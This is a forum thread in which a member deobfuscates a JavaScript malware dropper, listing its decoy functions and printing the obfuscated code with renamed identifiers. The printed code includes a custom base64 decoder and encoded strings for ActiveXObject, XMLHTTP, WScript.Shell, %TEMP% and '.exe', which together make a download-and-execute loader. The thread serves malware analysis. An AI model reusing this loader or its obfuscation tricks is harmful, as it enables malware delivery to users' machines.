My knowledge of programming and code is zero :oops:...yet I find your Deobfuscations fascinating.
..I can only marvel at the way you tackle these challenges.
You are a very clever penguin:D
 

DardiM

Oh thanks a lot for these words :oops: : they go straight to my heart :)
 

DardiM

More about (3) "4 6183943701_01-08-2016.js"

List of unused vars and functions found, there to "obfuscate the content more":
Several parts : Tetromino :confused:


var fabled = "AAF2AA";
XWaxeQhw = "AAF11AA";

hGaSMa = "AAF10AA";
krDwvrh = "AAF12AA";
SswQdi = "AAF13AA";

var Native = function(options){

};
Native.implement = function(objects, properties){

for (var i = 0, l = objects.length; i < l; i++) objects.implement(properties);

};
Native.genericize = function(object, property, check){

if ((!check || !object[property]) && typeof object.prototype[property] == 'function') object[property] = function(){
var args = Array.prototype.slice.call(arguments);
return object.prototype[property].apply(args.shift(), args);
};
};
Native.typize = function(object, family){

if (!object.type) object.type = function(item){
return ($type(item) === family);
};
};
rodmands.create = function(){

var publisher = new MBJSL.Publisher();
var spyFunction1 = sinon.spy();
publisher.subscribe(spyFunction1, this.type1);
publisher.publish(this.type1);

ok(spyFunction1.calledWith(), "Function called without arguments");
publisher.publish(this.type1, "PROPER1");
ok(spyFunction1.calledWith("PROPER1"), "Function called with 'PROPER1' argument");
publisher.publish(this.type1, ["PROPER1", "PROPER2"]);
ok(spyFunction1.calledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");

};

rodmands.subtract = function(param1, param2) {

return new rodmands(param1.x - param2.x, param1.y - param2.y);
};

function rodmands(x, y) {

this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};

rodmands.scale = function(p, scaleX, scaleY) {

if (isObject(scaleX)) {
scaleY = scaleX.y;
scaleX = scaleX.x;
} else if (!isNumber(scaleY)) {
scaleY = scaleX;
}
return new rodmands(p.x * scaleX, p.y * scaleY);
};

rodmands.sameOrN = function(param1, param2) {

return param1.D == param2.D || param1.F == param2.F;
};

rodmands.angle = function(p) {

return Math.atan2(p.y, p.x);
};

function achievment(bidttt){

if(bidttt==1){
return 2;
}else{
return 17;
}
return 3;
};

Tetromino.prototype.nextFrame = function () {

if ((this.selectedFrame + 1) < this.frameNumber) {
this.selectedFrame++;
} else {
this.selectedFrame = 0
}
};

function Tetromino(index){

this.x = 0;
this.y = 0;
this.selectedFrame = 0;
this.getNew(index);
}

Tetromino.prototype.getNew = function (index) {

this.x = 4;
index = 6;
this.index = index;
switch (index) {
case 1: this.frameNumber = 1;

this.sprite = 5;
this.sprite = 1;
this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) );
break;
case 2:this.frameNumber = 4;
this.sprite = 4;
this.sprite = 2;
this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) );
break;
case 3:this.frameNumber = 4;
this.sprite = 7;
this.sprite = 3;
this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) );
break;
case 4: this.sprite = 2;
this.sprite = 4;
this.frameNumber = 2;
this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) );
break;
case 5:this.frameNumber = 4;
this.sprite = 3;
this.sprite = 5;
this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) );
break;
case 6: this.sprite = 1;
this.sprite = 6;
this.frameNumber = 4;
this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) );
break;
case 7: this.sprite = 6;
this.sprite = 7;
this.frameNumber = 4;
this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) );
break; }
};
 

DardiM

I have made modifications to protect members: you can't copy-paste and run the parts below.
Just for informative purposes :p


Obfuscated :

votgorodazaspinoyiputkoroheCCCrodmands.create = function(){

var votgorodazaspinoyiputkoroheCCCpublisher = new votgorodazaspinoyiputkoroheCCCMBJSL.votgorodazaspinoyiputkoroheCCCPublisher();

var votgorodazaspinoyiputkoroheCCCspyFunction1 = votgorodazaspinoyiputkoroheCCCsinon.votgorodazaspinoyiputkoroheCCCspy();

votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCsubscribe(votgorodazaspinoyiputkoroheCCCspyFunction1, this.votgorodazaspinoyiputkoroheCCCtype1);


votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(), "Function called without arguments");

votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, "PROPER1");
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith("PROPER1"), "Function called with 'PROPER1' argument");

votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, ["PROPER1", "PROPER2"]);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");

};

votgorodazaspinoyiputkoroheCCCrodmands.votgorodazaspinoyiputkoroheCCCsubtract = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCCparam1.x - votgorodazaspinoyiputkoroheCCCparam2.x, votgorodazaspinoyiputkoroheCCCparam1.y - votgorodazaspinoyiputkoroheCCCparam2.y);
};


var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;

function votgorodazaspinoyiputkoroheCCCachievment(votgorodazaspinoyiputkoroheCCCbidttt){if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}else{return 17;}
return 3;};
function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
request = votgorodazaspinoyiputkoroheCCCrivulet;
for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
return request;
};

var votgorodazaspinoyiputkoroheCCCchosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};

var votgorodazaspinoyiputkoroheCCClulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);

var votgorodazaspinoyiputkoroheCCClulalulaI, votgorodazaspinoyiputkoroheCCClulalulan = votgorodazaspinoyiputkoroheCCClulalula.length;
for (votgorodazaspinoyiputkoroheCCClulalulaI= 0; votgorodazaspinoyiputkoroheCCClulalulaI < votgorodazaspinoyiputkoroheCCClulalulan; ++votgorodazaspinoyiputkoroheCCClulalulaI) {
votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCClulalulaI] = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCClulalulaI] - 5;
}
votgorodazaspinoyiputkoroheCCCrodmands.scale = function(votgorodazaspinoyiputkoroheCCCp, votgorodazaspinoyiputkoroheCCCscaleX, votgorodazaspinoyiputkoroheCCCscaleY) {
if (votgorodazaspinoyiputkoroheCCCisObject(votgorodazaspinoyiputkoroheCCCscaleX)) {
votgorodazaspinoyiputkoroheCCCscaleY = votgorodazaspinoyiputkoroheCCCscaleX.y;
votgorodazaspinoyiputkoroheCCCscaleX = votgorodazaspinoyiputkoroheCCCscaleX.x;
} else if (!votgorodazaspinoyiputkoroheCCCisNumber(votgorodazaspinoyiputkoroheCCCscaleY)) {
votgorodazaspinoyiputkoroheCCCscaleY = votgorodazaspinoyiputkoroheCCCscaleX;
}
return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCCp.x * votgorodazaspinoyiputkoroheCCCscaleX, votgorodazaspinoyiputkoroheCCCp.y * votgorodazaspinoyiputkoroheCCCscaleY);
};
votgorodazaspinoyiputkoroheCCCrodmands.votgorodazaspinoyiputkoroheCCCsameOrN = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
return votgorodazaspinoyiputkoroheCCCparam1.D == votgorodazaspinoyiputkoroheCCCparam2.D || votgorodazaspinoyiputkoroheCCCparam1.F == votgorodazaspinoyiputkoroheCCCparam2.F;
};

votgorodazaspinoyiputkoroheCCCrodmands.angle = function(votgorodazaspinoyiputkoroheCCCp) {
return Math.atan2(votgorodazaspinoyiputkoroheCCCp.y, votgorodazaspinoyiputkoroheCCCp.x);
};

function votgorodazaspinoyiputkoroheCCCTetromino(index){
this.x = 0;
this.y = 0;
this.selectedFrame = 0;
this.getNew(index);
}


String.prototype.votgorodazaspinoyiputkoroheCCCmanysecretthings = function() {

var votgorodazaspinoyiputkoroheCCCc1, votgorodazaspinoyiputkoroheCCCc2, votgorodazaspinoyiputkoroheCCCc3, votgorodazaspinoyiputkoroheCCCc4;
var votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCClen, votgorodazaspinoyiputkoroheCCCout;
var votgorodazaspinoyiputkoroheCCCstr = this.replace(/RAPAPIPATA/g, '');
votgorodazaspinoyiputkoroheCCClen = votgorodazaspinoyiputkoroheCCCstr.length;
votgorodazaspinoyiputkoroheCCCi = 0;
votgorodazaspinoyiputkoroheCCCout = "";

while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen) {
do {
votgorodazaspinoyiputkoroheCCCc1 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc1 == -1);

if (votgorodazaspinoyiputkoroheCCCc1 == -1)
break;
var votgorodazaspinoyiputkoroheCCCdodo = false;
do {
votgorodazaspinoyiputkoroheCCCc2 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff];
votgorodazaspinoyiputkoroheCCCdodo = votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc2 == -1;
} while (votgorodazaspinoyiputkoroheCCCdodo);

if (votgorodazaspinoyiputkoroheCCCc2 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode((votgorodazaspinoyiputkoroheCCCc1 << 2) | ((votgorodazaspinoyiputkoroheCCCc2 & 0x30) >> 4));

do {
votgorodazaspinoyiputkoroheCCCc3 = votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff;

if (votgorodazaspinoyiputkoroheCCCc3 == 61)
return votgorodazaspinoyiputkoroheCCCout;

votgorodazaspinoyiputkoroheCCCc3 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCc3];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc3 == -1);

if (votgorodazaspinoyiputkoroheCCCc3 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode(((votgorodazaspinoyiputkoroheCCCc2 & 0XF) << 4) | ((votgorodazaspinoyiputkoroheCCCc3 & 0x3c) >> 2));

do {
votgorodazaspinoyiputkoroheCCCc4 = votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff;

if (votgorodazaspinoyiputkoroheCCCc4 == 61)
return votgorodazaspinoyiputkoroheCCCout;

votgorodazaspinoyiputkoroheCCCc4 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCc4];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc4 == -1);

if (votgorodazaspinoyiputkoroheCCCc4 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode(((votgorodazaspinoyiputkoroheCCCc3 & 0x03) << 6) | votgorodazaspinoyiputkoroheCCCc4);
}

return votgorodazaspinoyiputkoroheCCCout;
};


votgorodazaspinoyiputkoroheCCCTetromino.prototype.nextFrame = function () {

if ((this.selectedFrame + 1) < this.frameNumber) {
this.selectedFrame++;
} else {
this.selectedFrame = 0
}
};

var votgorodazaspinoyiputkoroheCCCVARDOCF ="JVRFTVAl".votgorodazaspinoyiputkoroheCCCmanysecretthings();
var votgorodazaspinoyiputkoroheCCCfinde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".votgorodazaspinoyiputkoroheCCCmanysecretthings();
String.prototype.votgorodazaspinoyiputkoroheCCCcenter2 = function () {
var votgorodazaspinoyiputkoroheCCCpirkinst = {
votgorodazaspinoyiputkoroheCCCVARDOCG: this
};
votgorodazaspinoyiputkoroheCCCpirkinst.votgorodazaspinoyiputkoroheCCCVARDOCE = votgorodazaspinoyiputkoroheCCCpirkinst.votgorodazaspinoyiputkoroheCCCVARDOCG["c3VRAPAPIPATAic3RyRAPAPIPATAaW5RAPAPIPATAn".votgorodazaspinoyiputkoroheCCCmanysecretthings()](votgorodazaspinoyiputkoroheCCCerrant, votgorodazaspinoyiputkoroheCCCchosen);
return votgorodazaspinoyiputkoroheCCCpirkinst.votgorodazaspinoyiputkoroheCCCVARDOCE;
};

var votgorodazaspinoyiputkoroheCCCsirdallos ="RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz".votgorodazaspinoyiputkoroheCCCmanysecretthings();
var votgorodazaspinoyiputkoroheCCCNative = function(options){

};votgorodazaspinoyiputkoroheCCCNative.votgorodazaspinoyiputkoroheCCCimplement = function(votgorodazaspinoyiputkoroheCCCobjects, votgorodazaspinoyiputkoroheCCCproperties){
for (var votgorodazaspinoyiputkoroheCCCi = 0, votgorodazaspinoyiputkoroheCCCl = votgorodazaspinoyiputkoroheCCCobjects.length; votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCCl; votgorodazaspinoyiputkoroheCCCi++) votgorodazaspinoyiputkoroheCCCobjects[votgorodazaspinoyiputkoroheCCCi].votgorodazaspinoyiputkoroheCCCimplement(votgorodazaspinoyiputkoroheCCCproperties);
};
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
var votgorodazaspinoyiputkoroheCCCDoUtra = [votgorodazaspinoyiputkoroheCCCfinde, votgorodazaspinoyiputkoroheCCCsirdallos,votgorodazaspinoyiputkoroheCCCVARDOCF, ""+"."+("votgorodazaspinoyiputkoroheCCCindus","votgorodazaspinoyiputkoroheCCCjubilation","votgorodazaspinoyiputkoroheCCCchampionship","votgorodazaspinoyiputkoroheCCCshepherdess","votgorodazaspinoyiputkoroheCCCpredict","votgorodazaspinoyiputkoroheCCCconsumes","votgorodazaspinoyiputkoroheCCCtransmitting","votgorodazaspinoyiputkoroheCCCcucumber","exe"), "UnRAPAPIPATAVuRAPAPIPATA".votgorodazaspinoyiputkoroheCCCmanysecretthings(),votgorodazaspinoyiputkoroheCCCd7];
votgorodazaspinoyiputkoroheCCCDoUtraAANO = votgorodazaspinoyiputkoroheCCCDoUtra.shift()
var votgorodazaspinoyiputkoroheCCCZumZum = this[votgorodazaspinoyiputkoroheCCCDoUtraAANO];
votgorodazaspinoyiputkoroheCCCfabled = "AAF2AA";
votgorodazaspinoyiputkoroheCCCNative.votgorodazaspinoyiputkoroheCCCgenericize = function(object, votgorodazaspinoyiputkoroheCCCproperty, votgorodazaspinoyiputkoroheCCCcheck){
if ((!votgorodazaspinoyiputkoroheCCCcheck || !object[votgorodazaspinoyiputkoroheCCCproperty]) && typeof object.prototype[votgorodazaspinoyiputkoroheCCCproperty] == 'function') object[votgorodazaspinoyiputkoroheCCCproperty] = function(){
var votgorodazaspinoyiputkoroheCCCargs = Array.prototype.slice.call(arguments);
return object.prototype[votgorodazaspinoyiputkoroheCCCproperty].apply(votgorodazaspinoyiputkoroheCCCargs.shift(), votgorodazaspinoyiputkoroheCCCargs);
};
};
votgorodazaspinoyiputkoroheCCCNative.votgorodazaspinoyiputkoroheCCCtypize = function(object, votgorodazaspinoyiputkoroheCCCfamily){
if (!object.type) object.type = function(item){
return (votgorodazaspinoyiputkoroheCCC$type(item) === votgorodazaspinoyiputkoroheCCCfamily);
};
};
votgorodazaspinoyiputkoroheCCCcasque = (("votgorodazaspinoyiputkoroheCCCactivists", "votgorodazaspinoyiputkoroheCCCsurmount", "votgorodazaspinoyiputkoroheCCCparenthesis", "votgorodazaspinoyiputkoroheCCCopportune", "votgorodazaspinoyiputkoroheCCCengross", "votgorodazaspinoyiputkoroheCCCillimitable", "votgorodazaspinoyiputkoroheCCCselfevident", "pwrthrthrthtr") + "hrhrwhrwh").votgorodazaspinoyiputkoroheCCCcenter2();
votgorodazaspinoyiputkoroheCCCtudabilo1 = (("votgorodazaspinoyiputkoroheCCCtownsman", "votgorodazaspinoyiputkoroheCCCended", "votgorodazaspinoyiputkoroheCCCrepository", "votgorodazaspinoyiputkoroheCCCgrounded", "votgorodazaspinoyiputkoroheCCCcoiffure", "votgorodazaspinoyiputkoroheCCCindivisible", "votgorodazaspinoyiputkoroheCCCprotecting", "votgorodazaspinoyiputkoroheCCCelector", "votgorodazaspinoyiputkoroheCCCrequested", "serhrth") + "herrth4th4wh").votgorodazaspinoyiputkoroheCCCcenter2();
var votgorodazaspinoyiputkoroheCCCd2 = votgorodazaspinoyiputkoroheCCCDoUtra.pop();
var votgorodazaspinoyiputkoroheCCCrampart = new votgorodazaspinoyiputkoroheCCCZumZum(votgorodazaspinoyiputkoroheCCCd2.split("}")[1]);
var votgorodazaspinoyiputkoroheCCCsudabilo1 = new votgorodazaspinoyiputkoroheCCCZumZum(votgorodazaspinoyiputkoroheCCCd2.split("}")[0]);
var votgorodazaspinoyiputkoroheCCCvulture = votgorodazaspinoyiputkoroheCCCrampart[votgorodazaspinoyiputkoroheCCCDoUtra.shift()](votgorodazaspinoyiputkoroheCCCDoUtra.shift());
var votgorodazaspinoyiputkoroheCCCweasel = "E";

var votgorodazaspinoyiputkoroheCCCamalgamation = votgorodazaspinoyiputkoroheCCCDoUtra.shift();
var votgorodazaspinoyiputkoroheCCCpromises = votgorodazaspinoyiputkoroheCCCDoUtra.shift();
var votgorodazaspinoyiputkoroheCCCostrokoncert = "b3RAPAPIPATABlbRAPAPIPATAg==".votgorodazaspinoyiputkoroheCCCmanysecretthings();

votgorodazaspinoyiputkoroheCCCTetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};

hjb2RlQXJyYXkpDQp7DQogICAgdmFyIHQyPW5ldyBBcnJheSgpOw0KCQ0KdDJbMHg4MF09MHgwMEM3O3QyWzB4ODFdPTB4MDBGQzt0MlsweDgyXT0weDAwRTk7dDJbMHg4M109MHgwMEUyO3QyWzB4ODRdPTB4MDBFNDt0MlsweDg1XT0weDAwRTA7dDJbMHg4Nl09MHgwMEU1O3QyWzB4ODddPTB4MDBFNzt0MlsweDg4XT0weDAwRUE7dDJbMHg4OV09MHgwMEVCO3QyWzB4OEFdPTB4MDBFODt0MlsweDhCXT0weDAwRUY7dDJbMHg4Q109MHgwMEVFO3QyWzB4OERdPTB4MDBFQzt0MlsweDhFXT0weDAwQzQ7dDJbMHg4Rl09MHgwMEM1O3QyWzB4OTBdPTB4MDBDOTt0MlsweDkxXT0weDAwRTY7dDJbMHg5Ml09MHgwMEM2O3QyWzB4OTNdPTB4MDBGNDt0MlsweDk0XT0weDAwRjY7dDJbMHg5NV09MHgwMEYyO3QyWzB4OTZdPTB4MDBGQjt0MlsweDk3XT0weDAwRjk7dDJbMHg5OF09MHgwMEZGO3QyWzB4OTldPTB4MDBENjt0MlsweDlBXT0weDAwREM7dDJbMHg5Ql09MHgwMEEyO3QyWzB4OUNdPTB4MDBBMzt0MlsweDlEXT0weDAwQTU7dDJbMHg5RV09MHgyMEE3O3QyWzB4OUZdPTB4MDE5Mjt0MlsweEEwXT0weDAwRTE7dDJbMHhBMV09MHgwMEVEO3QyWzB4QTJdPTB4MDBGMzt0MlsweEEzXT0weDAwRkE7dDJbMHhBNF09MHgwMEYxO3QyWzB4QTVdPTB4MDBEMTt0MlsweEE2XT0weDAwQUE7dDJbMHhBN109MHgwMEJBO3QyWzB4QThdPTB4MDBCRjt0MlsweEE5XT0weDIzMTA7dDJbMHhBQV09MHgwMEFDO3QyWzB4QUJdPTB4MDBCRDt0MlsweEFDXT0weDAwQkM7dDJbMHhBRF09MHgwMEExO3QyWzB4QUVdPTB4MDBBQjt0MlsweEFGXT0weDAwQkI7dDJbMHhCMF09MHgyNTkxO3QyWzB4QjFdPTB4MjU5Mjt0MlsweEIyXT0weDI1OTM7dDJbMHhCM109MHgyNTAyO3QyWzB4QjRdPTB4MjUyNDt0MlsweEI1XT0weDI1NjE7dDJbMHhCNl09MHgyNTYyO3QyWzB4QjddPTB4MjU1Njt0MlsweEI4XT0weDI1NTU7dDJbMHhCOV09MHgyNTYzO3QyWzB4QkFdPTB4MjU1MTt0MlsweEJCXT0weDI1NTc7dDJbMHhCQ109MHgyNTVEO3QyWzB4QkRdPTB4MjU1Qzt0MlsweEJFXT0weDI1NUI7dDJbMHhCRl09MHgyNTEwO3QyWzB4QzBdPTB4MjUxNDt0MlsweEMxXT0weDI1MzQ7dDJbMHhDMl09MHgyNTJDO3QyWzB4QzNd